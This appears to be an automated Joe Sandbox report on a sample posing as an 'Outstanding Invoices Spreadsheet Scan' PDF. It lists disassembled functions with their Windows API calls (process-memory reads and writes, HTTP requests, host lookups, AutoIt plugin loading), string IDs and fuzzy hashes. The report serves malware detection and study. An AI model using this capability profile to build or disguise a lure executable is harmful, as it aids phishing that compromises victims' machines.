                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _strncmp
                                                                              • String ID: >$R$U
                                                                              • API String ID: 909875538-1924298640
                                                                              • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                              • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                              • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                              • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                              APIs
                                                                                • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                              • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                              • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                              • CoUninitialize.OLE32 ref: 0046CE50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                              • String ID: .lnk
                                                                              • API String ID: 886957087-24824748
                                                                              • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                              • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                              • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                              Strings
                                                                              • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                              • API String ID: 176396367-557222456
                                                                              • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                              • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                              • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                              • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopyInit_malloc
                                                                              • String ID: 4RH
                                                                              • API String ID: 2981388473-749298218
                                                                              • Opcode ID: 1f909eb9e3e5aea9af852ba20f23d524d6b7c687d852780188c37355aae39748
                                                                              • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                              • Opcode Fuzzy Hash: 1f909eb9e3e5aea9af852ba20f23d524d6b7c687d852780188c37355aae39748
                                                                              • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                              APIs
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • __wcsnicmp.LIBCMT ref: 0046681A
                                                                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                              • String ID: LPT$HH
                                                                              • API String ID: 3035604524-2728063697
                                                                              • Opcode ID: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                              • Opcode Fuzzy Hash: 2945cb5b31277d8c8021d55f3d7ec86f9f5d8a101f6134c00f702d091f19bef7
                                                                              • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                              APIs
                                                                                • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                              • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                              • String ID: @
                                                                              • API String ID: 4055202900-2766056989
                                                                              • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                              • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                              • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_memset_wcslen
                                                                              • String ID: |
                                                                              • API String ID: 915713708-2343686810
                                                                              • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                              • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                              • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                              • HttpQueryInfoW.WININET ref: 0044A892
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 3705125965-3916222277
                                                                              • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                              • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                              • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                              • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                              • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                              • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: AU3_GetPluginDetails
                                                                              • API String ID: 145871493-4132174516
                                                                              • Opcode ID: c57ea1ff5107733e7f7cf5b85816c61dda63c98595592927f1df8c424d4e369b
                                                                              • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                              • Opcode Fuzzy Hash: c57ea1ff5107733e7f7cf5b85816c61dda63c98595592927f1df8c424d4e369b
                                                                              • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 3375834691-2298589950
                                                                              • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                              • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                              • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                              • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                              • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                              • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                              • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                              • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                              • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                              • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                              • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume
                                                                              • String ID: HH
                                                                              • API String ID: 2507767853-2761332787
                                                                              • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                              • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                              • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                              • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                              • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                              • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                              • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                              APIs
                                                                                • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                              • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                              • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                              • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                              • String ID: HH
                                                                              • API String ID: 1515696956-2761332787
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                              • DrawMenuBar.USER32 ref: 00449828
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$InfoItem$Draw_malloc
                                                                              • String ID: 0
                                                                              • API String ID: 772068139-4108050209
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
